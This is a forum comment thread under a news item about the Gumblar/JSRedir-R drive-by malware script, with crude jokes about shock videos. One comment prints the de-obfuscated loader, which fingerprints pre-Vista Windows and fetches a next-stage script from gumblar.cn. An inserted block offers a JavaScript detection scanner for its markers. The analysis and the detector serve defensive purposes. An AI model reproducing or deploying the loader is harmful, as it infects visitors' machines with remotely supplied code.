The Register® — Biting the hand that feeds IT


New script outstrips all other drive-by download risks

A newly-created malicious script has become the source of almost half the drive-by download attacks tracked by one security firm. JSRedir-R accounts for around 43 per cent of all malicious infections found on websites over the last week, according to a study by net security firm Sophos, published on Thursday. The malware crops …

This topic is closed for new posts.
Alien

Another good writeup here

Another good writeup here: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

It seems to be cropping up all over the place with no obvious infection vector.

Linux

2G1C

haha.

"Erm, I have a virus"

"Did you go on 2G1C?"

"Erm, yes...."

Anonymous Coward
Alert

2 girls 1 cup

I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.

I nearly threw up on my laptop.

Coat

"2 Girls 1 Cup scat video viral website."

I guess they must have crappy security...

Anonymous Coward
Anonymous Coward

Malware

I thought malware writes itself nowadays.

Boffin

Clever script

I ran into this on one site, glad I had avast! running. The script was on every page, and an iframe on the home page only. There's a bit of obfuscation beyond the character escaping, which I've removed here. It checks for the browser running on pre-Vista Windows, and uses typeof() cleverly to make sure it only runs once. Note that it sends the JavaScript engine version number to gumblar.cn, which can then provide a script that is known to be effective on the user's particular browser, and divulge nothing to researchers using non-vulnerable browsers. Hopefully this is readable, the form refuses to respect any kind of formatting.

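function(){
    var versionString = "";
    // Run only on pre-Vista Windows, when the miek=1 cookie is absent, and only once per page
    if( (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0) && (document.cookie.indexOf("miek=1")<0) && (typeof(zrvzts)!=typeof("A")) ) {
        zrvzts="A"; // run-once marker tested by the typeof() check above
        if(window.ScriptEngine) {
            versionString = "" + ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();
        }
        // Request the next-stage script, passing the script engine version as the id
        document.write(" <script src=//gumblar.cn/rss/?id=" + versionString + "></script>" );
    }
}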
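A site owner can check served pages for the markers visible in the script quoted in the comment above. The following is an added example, not part of the original comment: the names scanPage, normalize and decodeEscapes, the weights, the threshold and the sample pages are all assumptions made for illustration, and the escaping styles handled (%XX, %uXXXX, \xXX, \uXXXX) are assumed rather than taken from the page.

```javascript
'use strict';

// Indicators taken from the de-obfuscated script quoted in the post above.
// Weights and the threshold are illustrative choices, not tuned values.
const INDICATORS = [
  { name: 'loader-domain', weight: 3, re: /gumblar\.cn/i },
  { name: 'engine-version', weight: 1, re: /ScriptEngine(?:Major|Minor|Build)Version/ },
  { name: 'cookie-guard', weight: 1, re: /cookie\.indexOf\(\s*["']miek=1["']/ },
  { name: 'pre-vista-check', weight: 1, re: /indexOf\(\s*["']NT 6["']\s*\)\s*<\s*0/ },
  { name: 'script-write', weight: 1, re: /document\.write\([^)]*<script/i },
];
const THRESHOLD = 3;

// Undo one layer of %XX, %uXXXX, \xXX and \uXXXX character escaping.
function decodeEscapes(text) {
  return text.replace(
    /(?:%u|\\u)([0-9a-f]{4})|(?:%|\\x)([0-9a-f]{2})/gi,
    (_, wide, narrow) => String.fromCharCode(parseInt(wide || narrow, 16))
  );
}

// Decode repeatedly so nested escaping is unwrapped, with a pass limit.
function normalize(text, maxPasses = 3) {
  let current = text;
  for (let i = 0; i < maxPasses; i++) {
    const next = decodeEscapes(current);
    if (next === current) break;
    current = next;
  }
  return current;
}

// Score a page body against the indicators after normalising it.
function scanPage(html) {
  const decoded = normalize(html);
  const hits = INDICATORS.filter((i) => i.re.test(decoded));
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  return { suspicious: score >= THRESHOLD, score, hits: hits.map((i) => i.name) };
}

// Constructed samples: an inert string assignment carrying the escaped markers.
const esc = (s) => [...s].map((c) => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const CLEAN = '<html><script>document.write("<b>hello</b>");</script></html>';
const INJECTED = '<html><script>var t=unescape("' +
  esc('indexOf("NT 6")<0 cookie.indexOf("miek=1")<0 ScriptEngineBuildVersion() //gumblar.cn/rss/?id=') +
  '");</script></html>';

console.log(scanPage(CLEAN), scanPage(INJECTED));
```

The behavioural markers score separately from the domain, so a copy of the script pointed at a different host is still flagged once three of them appear together.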

Coat

@The Author

"The malicious script has also cropped up on the 2 Girls 1 Cup scat video viral website."

NO JUST NO

It took me a month to get that image out of my head and here you go putting it back there.

I guess I'm just going to do like Sam Neill in Event Horizon

http://www.ibiblio.org/samneill/pictures/eh/510beautiful1.jpg

/Good bye to my eyes

Jobs Horns

apple salesmen.

Apple will be happy, more of the weak-minded who get this kind of crap on their computer will be driven to buy a Mac (which is perfect for them).

Apple could write some themselves but they would be 200 megs and keep asking you if you want to update them.

Anonymous Coward
Unhappy

@AC 15.01

>I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.<

Yeah, thanks for that. You owe me a new computer. This one smells real bad now

Stop

2g1c?

'2 girls 1 cup' < '1 guy 1 jar' < '1 guy 1 screwdriver'

God only knows what's going to be next.

Joke

I always thought it was:

2 girls 1 crap?

Eric Arthur Blair suggests...

"God only knows what's going to be next."

Is it 1 Boot (stamping on) 1 Face (forever)?
